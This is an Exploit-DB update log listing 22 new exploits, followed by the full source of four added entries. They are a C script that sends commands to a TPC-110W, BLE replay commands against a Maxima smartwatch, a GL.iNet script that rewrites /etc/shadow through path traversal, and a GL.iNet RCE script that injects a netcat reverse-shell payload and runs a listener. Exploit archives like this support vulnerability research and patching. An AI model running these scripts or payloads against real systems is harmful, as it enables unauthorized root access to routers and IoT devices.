DB: 2024-03-04

22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution

exploits/hardware/remote/51846.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+    int sock;
+    struct sockaddr_in serv_addr;
+    char command[512];
+
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    if (sock < 0) {
+        perror("socket");
+        exit(1);
+    }
+
+    memset(&serv_addr, '0', sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
+    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
+        perror("inet_pton");
+        exit(1);
+    }
+
+    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
+        perror("connect");
+        exit(1);
+    }
+
+    // Run command with root privileges
+    snprintf(command, sizeof(command), "id\n"); // Check user id
+    write(sock, command, strlen(command));
+
+    memset(command, '0', sizeof(command));
+    read(sock, command, sizeof(command));
+    printf("%s\n", command);
+
+    close(sock);
+    return 0;
+}
+
+//gcc -o tpc-110w-exploit tpc-110w-exp

exploits/hardware/remote/51850.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)
+# Date: 13-Nov-2023
+# Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.
+# Vendor Homepage: https://www.maximawatches.com
+# Product Link: https://www.maximawatches.com/products/max-pro-power
+# Firmware Version: v1.0 486A
+# Tested on: Maxima Max Pro Power
+# CVE : CVE-2023-46916
+
+# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.
+# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions
+
+
+# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”
+
+# “sudo gattool -I” Starts gattool in interactive mode.
+
+# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.
+
+# “char-desc” Lists all handles for the device.
+
+# Run “mtu 247” in Gatttool after connection to set MTU for active connection.
+
+# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.
+
+# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.
+
+# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.
+
+# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor
+
+# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.
+
+# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.

exploits/hardware/remote/51851.py

@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+
+# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
+# Google Dork: intitle:"GL.iNet Admin Panel"
+# Date: XX/11/2023
+# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
+# Vendor Homepage: https://www.gli-net.com
+# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
+# Version: 4.3.7
+# Tested on: GL.iNet AR300M
+# CVE: CVE-2023-46455
+
+import crypt
+import requests
+from sys import argv
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def craft_shadow_file(salted_password):
+	shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
+	shadow_content += 'daemon:*:0:0:99999:7:::\n'
+	shadow_content += 'ftp:*:0:0:99999:7:::\n'
+	shadow_content += 'network:*:0:0:99999:7:::\n'
+	shadow_content += 'nobody:*:0:0:99999:7:::\n'
+	shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
+	shadow_content += 'stubby:x:0:0:99999:7:::\n'
+	shadow_content += 'ntp:x:0:0:99999:7::\n'
+	shadow_content += 'mosquitto:x:0:0:99999:7::\n'
+	shadow_content += 'logd:x:0:0:99999:7::\n'
+	shadow_content += 'ubus:x:0:0:99999:7::\n'
+	return shadow_content
+
+def replace_shadow_file(url, auth_token, shadow_content):
+	data = {
+		'sid': (None, auth_token),
+		'size': (None, '4'),
+		'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
+		'file': ('shadow', shadow_content)
+	}
+	requests.post(url, files=data, verify=False)
+
+def main(base_url, auth_token):
+	print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')
+
+	password = input('[?] New password for root user: ')
+	salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)
+
+	shadow_content = craft_shadow_file(salted_password)
+	print('[+] Crafted shadow file:\n{}'.format(shadow_content))
+
+	print('[*] Replacing shadow file with the crafted one')
+	replace_shadow_file(base_url+'/upload', auth_token, shadow_content)
+
+	print('[+] Done')
+
+if __name__ == '__main__':
+	if len(argv) < 3:
+		print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
+		exit(1)
+
+	main(argv[1], argv[2])

exploits/hardware/remote/51852.py

@@ -0,0 +1,105 @@
+#!/usr/bin/env python3
+
+# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
+# Google Dork: intitle:"GL.iNet Admin Panel"
+# Date: XX/11/2023
+# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
+# Vendor Homepage: https://www.gli-net.com
+# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
+# Version: 4.3.7
+# Tested on: GL.iNet AR300M
+# CVE: CVE-2023-46454
+
+import socket
+import requests
+import readline
+from time import sleep
+from random import randint
+from sys import stdout, argv
+from threading import Thread
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def trigger_revshell(url, auth_token, payload):
+	sleep(0.25)
+	data = {
+		'jsonrpc': '2.0',
+		'id': randint(1000, 9999),
+		'method': 'call',
+		'params': [
+			auth_token,
+			'plugins',
+			'get_package_info',
+			{'name': 'bas{}e-files'.format(payload)}
+		]
+	}
+	requests.post(url, json=data, verify=False)
+
+def get_command_response(s):
+	res = ''
+	while True:
+		try:
+			resp = s.recv(1).decode('utf-8')
+			res += resp
+		except UnicodeDecodeError:
+			pass
+		except socket.timeout:
+			break
+	return res
+
+def revshell_listen(revshell_ip, revshell_port):
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.settimeout(5)
+
+	try:
+		s.bind((revshell_ip, int(revshell_port)))
+		s.listen(1)
+	except Exception as e:
+		print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
+		exit(1)
+
+	try:
+		clsock, claddr = s.accept()
+		clsock.settimeout(2)
+		if clsock:
+			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
+			res = ''
+			while True:
+				command = input('$ ')
+				clsock.sendall('{}\n'.format(command).encode('utf-8'))
+				stdout.write(get_command_response(clsock))
+
+	except socket.timeout:
+		print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
+		s.close()
+
+	except KeyboardInterrupt:
+		print('\n[*] Closing connection')
+		try:
+			clsock.close()
+		except socket.error:
+			pass
+		except NameError:
+			pass
+		s.close()
+
+def main(base_url, auth_token, revshell_ip, revshell_port):
+	print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
+
+	payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
+	print('[+] Reverse shell payload: "{}"'.format(payload))
+
+	print('[*] Triggering reverse shell connection')
+	Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
+
+	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
+	revshell_listen(revshell_ip, revshell_port)
+
+	print('[+] Done')
+
+if __name__ == '__main__':
+	if len(argv) < 5:
+		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
+		exit(1)
+
+	main(argv[1], argv[2], argv[3], argv[4])